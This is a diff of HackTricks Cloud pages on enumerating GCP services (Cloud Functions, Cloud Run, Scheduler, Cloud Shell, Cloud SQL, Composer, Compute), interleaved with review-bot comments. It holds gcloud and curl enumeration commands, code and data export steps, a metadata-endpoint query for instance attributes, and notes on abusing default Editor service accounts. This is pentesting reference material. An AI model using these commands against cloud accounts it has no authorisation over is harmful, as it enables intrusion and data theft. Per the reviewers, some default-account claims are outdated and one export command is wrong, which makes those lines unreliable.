+[Google Cloud Functions](https://cloud.google.com/functions/) are designed to host your code, which **gets executed in response to events**, without necessitating the management of a host operating system. Additionally, these functions support the storage of environment variables, which the code can utilize.
+
+### Storage
+
+The Cloud Functions **code is stored in GCP Storage**. Therefore, anyone with **read access over buckets** in GCP is going to be able to **read the Cloud Functions code**.\
+The code is stored in a bucket like one of the following:
+
+- `gcf-sources--/-/version-/function-source.zip`
+- `gcf-v2-sources--/function-source.zip`
+
+For example:\
+`gcf-sources-645468741258-us-central1/function-1-003dcbdf-32e1-430f-a5ff-785a6e238c76/version-4/function-source.zip`
+
+> [!WARNING]
+> Any user with **read privileges over the bucket** storing the Cloud Function could **read the executed code**.
+
+### Artifact Registry
+
+If the cloud function is configured so the executed Docker container is stored inside and Artifact Registry repo inside the project, anyway with read access over the repo will be able to download the image and check the source code. For more info check:
+
+{{#ref}}
+gcp-artifact-registry-enum.md
+{{#endref}}
+
+### SA
+
+If not specified, by default the **App Engine Default Service Account** with **Editor permissions** over the project will be attached to the Cloud Function.
+
+### Triggers, URL & Authentication
+
+When a Cloud Function is created the **trigger** needs to be specified. One common one is **HTTPS**, this will **create an URL where the function** can be triggered via web browsing.\
+Other triggers are pub/sub, Storage, Filestore...
+
+The URL format is **`https://-.cloudfunctions.net/`**
+
+When the HTTPS tigger is used, it's also indicated if the **caller needs to have IAM authorization** to call the Function or if **everyone** can just call it:
+
+
+
+### Inside the Cloud Function
+
+The code is **downloaded inside** the folder **`/workspace`** with the same file names as the ones the files have in the Cloud Function and is executed with the user `www-data`.\
+The disk **isn't mounted as read-only.**
+
+### Enumeration
+
+```bash
+# List functions
+gcloud functions list
+gcloud functions describe # Check triggers to see how is this function invoked
+gcloud functions get-iam-policy
+
+# Get logs of previous runs. By default, limits to 10 lines
+gcloud functions logs read --limit [NUMBER]
+
+# Call a function
+curl https://-.cloudfunctions.net/
+gcloud functions call --data='{"message": "Hello World!"}'
+
+# If you know the name of projects you could try to BF cloud functions names
+
+# Get events that could be used to trigger a cloud function
+gcloud functions event-types list
+
+# Access function with authentication
+curl -X POST https://-.cloudfunctions.net/ \
+-H "Authorization: bearer $(gcloud auth print-identity-token)" \
+-H "Content-Type: application/json" \
+-d '{}'
+```
+
+### Privilege Escalation
+
+In the following page, you can check how to **abuse cloud function permissions to escalate privileges**:
+
+{{#ref}}
+../gcp-privilege-escalation/gcp-cloudfunctions-privesc.md
+{{#endref}}
+
+### Unauthenticated Access
+
+{{#ref}}
+../gcp-unauthenticated-enum-and-access/gcp-cloud-functions-unauthenticated-enum.md
+{{#endref}}
+
+### Post Exploitation
+
+{{#ref}}
+../gcp-post-exploitation/gcp-cloud-functions-post-exploitation.md
+{{#endref}}
+
+### Persistence
+
+{{#ref}}
+../gcp-persistence/gcp-cloud-functions-persistence.md
+{{#endref}}
+
+## References
+
+- [https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/#reviewing-stackdriver-logging](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/#reviewing-stackdriver-logging)
+
+{{#include ../../../banners/hacktricks-training.md}}
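Review bot: The `### SA` paragraph states as a fact that the function runs as the App Engine default service account with Editor over the project, but that only describes 1st-gen functions on older projects; as far as I recall, 2nd-gen functions default to the Compute Engine default SA and newly created projects no longer auto-grant Editor to either default SA, so an attacker who assumes Editor will mis-plan. I'd reword it to `By default a project default SA is attached (App Engine default for 1st gen, Compute Engine default for 2nd gen); don't assume Editor — read the attached SA from gcloud functions describe and check its roles with gcloud projects get-iam-policy, since newer projects no longer grant Editor to default SAs.` The `### Triggers, URL & Authentication` section has the same generation gap: the `cloudfunctions.net` shape is the 1st-gen URL, while 2nd-gen HTTP functions are served on a `run.app` host, which matters for the "BF cloud functions names" hint in the enumeration block and is worth one sentence there. Note also that the placeholders inside the URLs and the `describe`/`get-iam-policy` commands appear stripped in this rendering (`https://-.cloudfunctions.net/`), so the rendered page should be checked against the repo before anyone copies the commands.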
diff --git a/src/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-run-enum.md b/src/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-run-enum.md
new file mode 100644
index 000000000..49b68e259
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-run-enum.md
@@ -0,0 +1,111 @@
+# GCP - Cloud Run Enum
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Cloud Run
+
+Cloud Run is a serverless managed compute platform that lets you **run containers** directly on top of Google's scalable infrastructure.
+
+You can run your container or If you're using Go, Node.js, Python, Java, .NET Core, or Ruby, you can use the [source-based deployment](https://cloud.google.com/run/docs/deploying-source-code) option that **builds the container for you.**
+
+Google has built Cloud Run to **work well together with other services on Google Cloud**, so you can build full-featured applications.
+
+### Services and jobs
+
+On Cloud Run, your code can either run continuously as a _**service**_ or as a _**job**_. Both services and jobs run in the same environment and can use the same integrations with other services on Google Cloud.
+
+- **Cloud Run services.** Used to run code that responds to web requests, or events.
+- **Cloud Run jobs.** Used to run code that performs work (a job) and quits when the work is done.
+
+## Cloud Run Service
+
+Google [Cloud Run](https://cloud.google.com/run) is another serverless offer where you can search for env variables also. Cloud Run creates a small web server, running on port 8080 inside the container by default, that sits around waiting for an HTTP GET request. When the request is received, a job is executed and the job log is output via an HTTP response.
+
+### Relevant details
+
+- By **default**, the **access** to the web server is **public**, but it can also be **limited to internal traffic** (VPC...)\
+  Moreover, the **authentication** to contact the web server can be **allowing all** or to **require authentication via IAM**.
+- By default, the **encryption** uses a **Google managed key**, but a **CMEK** (Customer Managed Encryption Key) from **KMS** can also be **chosen**.
+- By **default**, the **service account** used is the **Compute Engine default one** which has **Editor** access over the project and it has the **scope `cloud-platform`.**
+- It's possible to define **clear-text environment variables** for the execution, and even **mount cloud secrets** or **add cloud secrets to environment variables.**
+- It's also possible to **add connections with Cloud SQL** and **mount a file system.**
+- The **URLs** of the services deployed are similar to **`https://-.a.run.app`**
+- A Run Service can have **more than 1 version or revision**, and **split traffic** among several revisions.
+
+### Enumeration
+
+```bash
+# List services
+gcloud run services list
+gcloud run services list --platform=managed
+gcloud run services list --platform=gke
+
+# Get info of a service
+gcloud run services describe --region
+
+# Get info of all the services together
+gcloud run services list --format=yaml
+gcloud run services list --platform=managed --format=json
+gcloud run services list --platform=gke --format=json
+
+# Get policy
+gcloud run services get-iam-policy --region
+
+# Get revisions
+gcloud run revisions list --region
+gcloud run revisions describe --region
+
+# Get domains
+gcloud run domain-mappings list
+gcloud run domain-mappings describe
+
+# Attempt to trigger a job unauthenticated
+curl
+
+# Attempt to trigger a job with your current gcloud authorization
+curl -H "Authorization: Bearer $(gcloud auth print-identity-token)"
+```
+
+## Cloud Run Jobs
+
+Cloud Run jobs are be a better fit for **containers that run to completion and don't serve requests**. Jobs don't have the ability to serve requests or listen on a port. This means that unlike Cloud Run services, jobs should not bundle a web server. Instead, jobs containers should exit when they are done.
+
+### Enumeration
+
+```bash
+gcloud beta run jobs list
+gcloud beta run jobs describe --region
+gcloud beta run jobs get-iam-policy --region
+```
+
+## Privilege Escalation
+
+In the following page, you can check how to **abuse cloud run permissions to escalate privileges**:
+
+{{#ref}}
+../gcp-privilege-escalation/gcp-run-privesc.md
+{{#endref}}
+
+## Unauthenticated Access
+
+{{#ref}}
+../gcp-unauthenticated-enum-and-access/gcp-cloud-run-unauthenticated-enum.md
+{{#endref}}
+
+## Post Exploitation
+
+{{#ref}}
+../gcp-post-exploitation/gcp-cloud-run-post-exploitation.md
+{{#endref}}
+
+## Persistence
+
+{{#ref}}
+../gcp-persistence/gcp-cloud-run-persistence.md
+{{#endref}}
+
+## References
+
+- [https://cloud.google.com/run/docs/overview/what-is-cloud-run](https://cloud.google.com/run/docs/overview/what-is-cloud-run)
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-scheduler-enum.md b/src/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-scheduler-enum.md
new file mode 100644
index 000000000..71d199dc8
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-scheduler-enum.md
@@ -0,0 +1,46 @@
+# GCP - Cloud Scheduler Enum
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Basic Information
+
+Google Cloud Scheduler is a fully managed **cron job service** that allows you to run arbitrary jobs—such as batch, big data jobs, cloud infrastructure operations—at fixed times, dates, or intervals. It is integrated with Google Cloud services, providing a way to **automate various tasks like updates or batch processing on a regular schedule**.
+
+Although from an offensive point of view this sounds amazing, it actually isn't that interesting because the service just allow to schedule certain simple actions at a certain time and not to execute arbitrary code.
+
+At the moment of this writing these are the actions this service allows to schedule:
+
+
+
+- **HTTP**: Send an HTTP request defining the headers and body of the request.
+- **Pub/Sub**: Send a message into an specific topic
+- **App Engine HTTP**: Send an HTTP request to an app built in App Engine
+- **Workflows**: Call a GCP Workflow.
+
+## Service Accounts
+
+A service account is not always required by each scheduler. The **Pub/Sub** and **App Engine HTTP** types don't require any service account. The **Workflow** does require a service account, but it'll just invoke the workflow.\
+Finally, the regular HTTP type doesn't require a service account, but it's possible to indicate that some kind of auth is required by the workflow and add either an **OAuth token or an OIDC token to the sent** HTTP request.
+
+> [!CAUTION]
+> Therefore, it's possible to steal the **OIDC** token and abuse the **OAuth** token from service accounts **abusing the HTTP type**. More on this in the privilege escalation page.
+
+Note that it's possible to limit the scope of the OAuth token sent, however, by default, it'll be `cloud-platform`.
+
+## Enumeration
+
+```bash
+# Get schedulers in a location
+gcloud scheduler jobs list --location us-central1
+
+# Get information of an specific scheduler
+gcloud scheduler jobs describe --location us-central1
+```
+
+## Privilege Escalation
+
+{{#ref}}
+../gcp-privilege-escalation/gcp-cloudscheduler-privesc.md
+{{#endref}}
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-shell-enum.md b/src/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-shell-enum.md
new file mode 100644
index 000000000..38133aa99
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-shell-enum.md
@@ -0,0 +1,28 @@
+# GCP - Cloud Shell Enum
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Basic Information
+
+Google Cloud Shell is an interactive shell environment for Google Cloud Platform (GCP) that provides you with **command-line access to your GCP resources directly from your browser or shell**. It's a managed service provided by Google, and it comes with a **pre-installed set of tools**, making it easier to manage your GCP resources without having to install and configure these tools on your local machine.\
+Moreover, its offered at **no additional cost.**
+
+**Any user of the organization** (Workspace) is able to execute **`gcloud cloud-shell ssh`** and get access to his **cloudshell** environment. However, **Service Accounts can't**, even if they are owner of the organization.
+
+There **aren't** **permissions** assigned to this service, therefore the **aren't privilege escalation techniques**. Also there **isn't any kind of enumeration**.
+
+Note that Cloud Shell can be **easily disabled** for the organization.
+
+### Post Exploitation
+
+{{#ref}}
+../gcp-post-exploitation/gcp-cloud-shell-post-exploitation.md
+{{#endref}}
+
+### Persistence
+
+{{#ref}}
+../gcp-persistence/gcp-cloud-shell-persistence.md
+{{#endref}}
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-sql-enum.md b/src/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-sql-enum.md
new file mode 100644
index 000000000..1b6cd0392
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-sql-enum.md
@@ -0,0 +1,89 @@
+# GCP - Cloud SQL Enum
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Basic Information
+
+Google Cloud SQL is a managed service that **simplifies setting up, maintaining, and administering relational databases** like MySQL, PostgreSQL, and SQL Server on Google Cloud Platform, removing the need to handle tasks like hardware provisioning, database setup, patching, and backups.
+
+Key features of Google Cloud SQL include:
+
+1. **Fully Managed**: Google Cloud SQL is a fully-managed service, meaning that Google handles database maintenance tasks like patching, updates, backups, and configuration.
+2. **Scalability**: It provides the ability to scale your database's storage capacity and compute resources, often without downtime.
+3. **High Availability**: Offers high availability configurations, ensuring your database services are reliable and can withstand zone or instance failures.
+4. **Security**: Provides robust security features like data encryption, Identity and Access Management (IAM) controls, and network isolation using private IPs and VPC.
+5. **Backups and Recovery**: Supports automatic backups and point-in-time recovery, helping you safeguard and restore your data.
+6. **Integration**: Seamlessly integrates with other Google Cloud services, providing a comprehensive solution for building, deploying, and managing applications.
+7. **Performance**: Offers performance metrics and diagnostics to monitor, troubleshoot, and improve database performance.
+
+### Password
+
+In the web console Cloud SQL allows the user to **set** the **password** of the database, there also a generate feature, but most importantly, **MySQL** allows to **leave an empty password and all of them allows to set as password just the char "a":**
+
+
+
+It's also possible to configure a password policy requiring **length**, **complexity**, **disabling reuse** and **disabling username in password**. All are disabled by default.
+
+**SQL Server** can be configured with **Active Directory Authentication**.
+
+### Zone Availability
+
+The database can be **available in 1 zone or in multiple**, of course, it's recommended to have important databases in multiple zones.
+
+### Encryption
+
+By default a Google-managed encryption key is used, but it's also **possible to select a Customer-managed encryption key (CMEK)**.
+
+### Connections
+
+- **Private IP**: Indicate the VPC network and the database will get an private IP inside the network
+- **Public IP**: The database will get a public IP, but by default no-one will be able to connect
+  - **Authorized networks**: Indicate public **IP ranges that should be allowed** to connect to the database
+- **Private Path**: If the DB is connected in some VPC, it's possible to enable this option and give **other GCP services like BigQuery access over it**
+
+
+
+### Data Protection
+
+- **Daily backups**: Perform automatic daily backups and indicate the number of backups you want to maintain.
+- **Point-in-time recovery**: Allows you to recover data from a specific point in time, down to a fraction of a second.
+- **Deletion Protection**: If enabled, the DB won't be able to be deleted until this feature is disabled
+
+### Enumeration
+
+```bash
+# Get SQL instances
+gcloud sql instances list
+gcloud sql instances describe # get IPs, CACert, settings
+
+# Get database names inside an instance (like information_schema, sys...)
+gcloud sql databases list --instance
+gcloud sql databases describe --instance
+
+# Get usernames inside the db instance
+gcloud sql users list --instance
+
+# Backups
+gcloud sql backups list --instance
+gcloud sql backups describe --instance
+```
+
+### Unauthenticated Enum
+
+{{#ref}}
+../gcp-unauthenticated-enum-and-access/gcp-cloud-sql-unauthenticated-enum.md
+{{#endref}}
+
+### Post Exploitation
+
+{{#ref}}
+../gcp-post-exploitation/gcp-cloud-sql-post-exploitation.md
+{{#endref}}
+
+### Persistence
+
+{{#ref}}
+../gcp-persistence/gcp-cloud-sql-persistence.md
+{{#endref}}
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-services/gcp-composer-enum.md b/src/pentesting-cloud/gcp-security/gcp-services/gcp-composer-enum.md
new file mode 100644
index 000000000..4abb9e39a
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-services/gcp-composer-enum.md
@@ -0,0 +1,43 @@ +# GCP - Composer Enum + +{{#include ../../../banners/hacktricks-training.md}} + +## Basic Information + +**Google Cloud Composer** is a fully managed **workflow orchestration service** built on **Apache Airflow**. It enables you to author, schedule, and monitor pipelines that span across clouds and on-premises data centers. With GCP Composer, you can easily integrate your workflows with other Google Cloud services, facilitating efficient data integration and analysis tasks. This service is designed to simplify the complexity of managing cloud-based data workflows, making it a valuable tool for data engineers and developers handling large-scale data processing tasks. + +### Enumeration + +```bash +# Get envs info +gcloud composer environments list --locations +gcloud composer environments describe --location + +# Get list of dags +gcloud composer environments storage dags list --environment --location +# Download dags code +mkdir /tmp/dags +gcloud composer environments storage dags export --environment --location --destination /tmp/dags + +# List Data from composer +gcloud composer environments storage data list --environment --location +# Download data +mkdir /tmp/data +gcloud composer environments storage data export --environment --location --destination /tmp/data + +# List Plugins from composer +gcloud composer environments storage plugins list --environment --location +# Download plugins +mkdir /tmp/plugins +gcloud composer environments storage data export --environment --location --destination /tmp/plugins +``` + +### Privesc + +In the following page you can check how to **abuse composer permissions to escalate privileges**: + +{{#ref}} +../gcp-privilege-escalation/gcp-composer-privesc.md +{{#endref}} + +{{#include ../../../banners/hacktricks-training.md}} 
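Review bot: The last command in the `# Download plugins` block of the new `gcp-composer-enum.md` reuses the `storage data export` subcommand, so it exports the data folder into `/tmp/plugins` rather than the plugins, which looks like a copy-paste slip from the block above it. It should read `gcloud composer environments storage plugins export --environment --location --destination /tmp/plugins`, mirroring the `storage plugins list` line two lines earlier. The dags and data export lines in the same block already use the matching subcommand, so only this one line needs changing.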
diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/README.md b/src/pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/README.md similarity index 63% rename from pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/README.md rename to src/pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/README.md index d1a085958..db56d94df 100644 --- a/pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/README.md +++ b/src/pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/README.md @@ -1,31 +1,17 @@ # GCP - Compute Enum -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../../banners/hacktricks-training.md}} ## GCP VPC & Networking Learn about how this works in: -{% content-ref url="gcp-vpc-and-networking.md" %} -[gcp-vpc-and-networking.md](gcp-vpc-and-networking.md) -{% endcontent-ref %} +{{#ref}} +gcp-vpc-and-networking.md +{{#endref}} ### Enumeration -{% code overflow="wrap" %} ```bash # List networks gcloud compute networks list @@ -63,17 +49,16 @@ gcloud compute network-firewall-policies list ## Get final FWs applied in a region gcloud compute network-firewall-policies get-effective-firewalls --network= --region ``` -{% endcode %} -You easily find compute instances with open firewall rules with [https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/gcp\_firewall\_enum](https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/gcp_firewall_enum) +You easily find compute instances with open firewall rules with [https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/gcp_firewall_enum](https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/gcp_firewall_enum) ## Compute instances This is the way you can **run virtual machines inside GCP.** Check this page for more information: -{% content-ref url="gcp-compute-instance.md" %} -[gcp-compute-instance.md](gcp-compute-instance.md) -{% endcontent-ref %} +{{#ref}} +gcp-compute-instance.md +{{#endref}} ### Enumeration 
@@ -98,35 +83,35 @@ gcloud compute disks get-iam-policy For more information about how to **SSH** or **modify the metadata** of an instance to **escalate privileges,** check this page: -{% content-ref url="../../gcp-privilege-escalation/gcp-local-privilege-escalation-ssh-pivoting.md" %} -[gcp-local-privilege-escalation-ssh-pivoting.md](../../gcp-privilege-escalation/gcp-local-privilege-escalation-ssh-pivoting.md) -{% endcontent-ref %} +{{#ref}} +../../gcp-privilege-escalation/gcp-local-privilege-escalation-ssh-pivoting.md +{{#endref}} ### Privilege Escalation In the following page, you can check how to **abuse compute permissions to escalate privileges**: -{% content-ref url="../../gcp-privilege-escalation/gcp-compute-privesc/" %} -[gcp-compute-privesc](../../gcp-privilege-escalation/gcp-compute-privesc/) -{% endcontent-ref %} +{{#ref}} +../../gcp-privilege-escalation/gcp-compute-privesc/ +{{#endref}} ### Unauthenticated Enum -{% content-ref url="../../gcp-unauthenticated-enum-and-access/gcp-compute-unauthenticated-enum.md" %} -[gcp-compute-unauthenticated-enum.md](../../gcp-unauthenticated-enum-and-access/gcp-compute-unauthenticated-enum.md) -{% endcontent-ref %} +{{#ref}} +../../gcp-unauthenticated-enum-and-access/gcp-compute-unauthenticated-enum.md +{{#endref}} ### Post Exploitation -{% content-ref url="../../gcp-post-exploitation/gcp-compute-post-exploitation.md" %} -[gcp-compute-post-exploitation.md](../../gcp-post-exploitation/gcp-compute-post-exploitation.md) -{% endcontent-ref %} +{{#ref}} +../../gcp-post-exploitation/gcp-compute-post-exploitation.md +{{#endref}} ### Persistence -{% content-ref url="../../gcp-persistence/gcp-compute-persistence.md" %} -[gcp-compute-persistence.md](../../gcp-persistence/gcp-compute-persistence.md) -{% endcontent-ref %} +{{#ref}} +../../gcp-persistence/gcp-compute-persistence.md +{{#endref}} ## Serial Console Logs 
@@ -158,12 +143,11 @@ The OS Configuration management feature allows you to define configuration polic This also allow to login in instances via IAM permissions, so it's very **useful for privesc and pivoting**. -{% hint style="warning" %} -In order to **enable os-config in a whole project or in an instance** you just need to set the **metadata** key **`enable-oslogin`** to **`true`** at the desired level.\ -Moreover, you can set the metadata **`enable-oslogin-2fa`** to **`true`** to enable the 2fa. - -When you enable it when crating an instance the metadata keys will be automatically set. -{% endhint %} +> [!WARNING] +> In order to **enable os-config in a whole project or in an instance** you just need to set the **metadata** key **`enable-oslogin`** to **`true`** at the desired level.\ +> Moreover, you can set the metadata **`enable-oslogin-2fa`** to **`true`** to enable the 2fa. +> +> When you enable it when crating an instance the metadata keys will be automatically set. More about **2fa in OS-config**, **it only applies if the user is a user**, if it's a SA (like the compute SA) it won't require anything extra. 
@@ -189,20 +173,18 @@ When an image is created you can choose **3 types of encryption**: Using **Googl You can query the list of non-standard images in a project with the following command: -{% code overflow="wrap" %} ```bash gcloud compute machine-images list gcloud compute machine-images describe gcloud compute machine-images get-iam-policy ``` -{% endcode %} You can then [**export**](https://cloud.google.com/sdk/gcloud/reference/compute/images/export) **the virtual disks** from any image in multiple formats. The following command would export the image `test-image` in qcow2 format, allowing you to download the file and build a VM locally for further investigation: ```bash gcloud compute images export --image test-image \ --export-format qcow2 --destination-uri [BUCKET] - + # Execute container inside a docker docker run --rm -ti gcr.io//secret:v1 sh ``` @@ -244,19 +226,6 @@ Check the Compute Instances privilege escalation section. ## References -* [https://blog.raphael.karger.is/articles/2022-08/GCP-OS-Patching](https://blog.raphael.karger.is/articles/2022-08/GCP-OS-Patching) +- [https://blog.raphael.karger.is/articles/2022-08/GCP-OS-Patching](https://blog.raphael.karger.is/articles/2022-08/GCP-OS-Patching) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-compute-instance.md b/src/pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-compute-instance.md similarity index 52% rename from pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-compute-instance.md rename to src/pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-compute-instance.md index 89929b36a..3e3ead129 100644 --- a/pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-compute-instance.md +++ b/src/pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-compute-instance.md @@ -1,19 +1,6 @@ # GCP - Compute Instances -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../../banners/hacktricks-training.md}} ## Basic Information @@ -29,10 +16,10 @@ To run a Confidential VM it might need to **change** things like the **type** of It's possible to **select the disk** to use or **create a new one**. If you select a new one you can: -* Select the **size** of the disk -* Select the **OS** -* Indicate if you want to **delete the disk when the instance is deleted** -* **Encryption**: By **default** a **Google managed key** will be used, but you can also **select a key from KMS** or indicate **raw key to use**. +- Select the **size** of the disk +- Select the **OS** +- Indicate if you want to **delete the disk when the instance is deleted** +- **Encryption**: By **default** a **Google managed key** will be used, but you can also **select a key from KMS** or indicate **raw key to use**. ### Deploy Container @@ -46,36 +33,36 @@ This service account has **Editor role over the whole project (high privileges). And the **default access scopes** are the following: -* **https://www.googleapis.com/auth/devstorage.read\_only** -- Read access to buckets :) -* https://www.googleapis.com/auth/logging.write -* https://www.googleapis.com/auth/monitoring.write -* https://www.googleapis.com/auth/servicecontrol -* https://www.googleapis.com/auth/service.management.readonly -* https://www.googleapis.com/auth/trace.append +- **https://www.googleapis.com/auth/devstorage.read\_only** -- Read access to buckets :) +- https://www.googleapis.com/auth/logging.write +- https://www.googleapis.com/auth/monitoring.write +- https://www.googleapis.com/auth/servicecontrol +- https://www.googleapis.com/auth/service.management.readonly +- https://www.googleapis.com/auth/trace.append However, it's possible to **grant it `cloud-platform` with a click** or specify **custom ones**. -
+
### Firewall It's possible to allow HTTP and HTTPS traffic. -
+
### Networking -* **IP Forwarding**: It's possible to **enable IP forwarding** from the creation of the instance. -* **Hostname**: It's possible to give the instance a permanent hostname. -* **Interface**: It's possible to add a network interface +- **IP Forwarding**: It's possible to **enable IP forwarding** from the creation of the instance. +- **Hostname**: It's possible to give the instance a permanent hostname. +- **Interface**: It's possible to add a network interface ### Extra Security These options will **increase the security** of the VM and are recommended: -* **Secure boot:** Secure boot helps protect your VM instances against boot-level and kernel-level malware and rootkits. -* **Enable vTPM:** Virtual Trusted Platform Module (vTPM) validates your guest VM pre-boot and boot integrity, and offers key generation and protection. -* **Integrity supervision:** Integrity monitoring lets you monitor and verify the runtime boot integrity of your shielded VM instances using Stackdriver reports. Requires vTPM to be enabled. +- **Secure boot:** Secure boot helps protect your VM instances against boot-level and kernel-level malware and rootkits. +- **Enable vTPM:** Virtual Trusted Platform Module (vTPM) validates your guest VM pre-boot and boot integrity, and offers key generation and protection. +- **Integrity supervision:** Integrity monitoring lets you monitor and verify the runtime boot integrity of your shielded VM instances using Stackdriver reports. Requires vTPM to be enabled. ### VM Access @@ -83,7 +70,7 @@ The common way to enable access to the VM is by **allowing certain SSH public ke However, it's also possible to **enable the access to the VM vial `os-config` service using IAM**. Moreover, it's possible to enable 2FA to access the VM using this service.\ When this **service** is **enabled**, the access via **SSH keys is disabled.** -
+
### Metadata @@ -103,25 +90,14 @@ curl "http://metadata.google.internal/computeMetadata/v1/instance/attributes/?re Moreover, **auth token for the attached service account** and **general info** about the instance, network and project is also going to be available from the **metadata endpoint**. For more info check: -{% embed url="https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf#6440" %} +{{#ref}} +https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf#6440 +{{#endref}} ### Encryption A Google-managed encryption key is used by default a but a Customer-managed encryption key (CMEK) can be configured. You can also configure what to do when the used CMEF is revoked: Noting or shut down the VM. -
+
-{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
